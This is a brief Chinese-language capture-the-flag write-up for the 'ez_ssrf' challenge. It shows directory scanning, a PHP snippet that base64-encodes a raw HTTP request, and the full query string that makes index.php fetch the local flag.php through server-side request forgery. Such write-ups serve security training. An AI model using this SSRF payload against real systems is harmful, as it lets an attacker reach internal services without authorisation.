NSS [HNCTF 2022 WEEK2]ez_ssrf
先拿dirsearch扫一下。
访问/flag.php
访问/index.php
应该是从index.php传参,ssrf然后访问到flag.php。
因此构造poc.php:
<?php $out = "GET /flag.php HTTP/1.1\r\n"; $out .= "Host: 127.0.0.1\r\n"; $out .= "Connection: Close\r\n\r\n"; echo base64_encode($out); ?>
得到data,host为127.0.0.1,port为80
传参:/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=
![[网鼎杯 2020 白虎组]PicDown(精讲)](https://ucc.alicdn.com/pic/developer-ecology/ttvoywnclpbvk_4985105ada37410ea42456dfabfbf07c.png?x-oss-process=image/format,webp/resize,h_160,m_lfit)
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解](https://ucc.alicdn.com/pic/developer-ecology/p5p4weppao3em_6196bea7b85e43ae88067b12f480beb1.png?x-oss-process=image/format,webp/resize,h_160,m_lfit)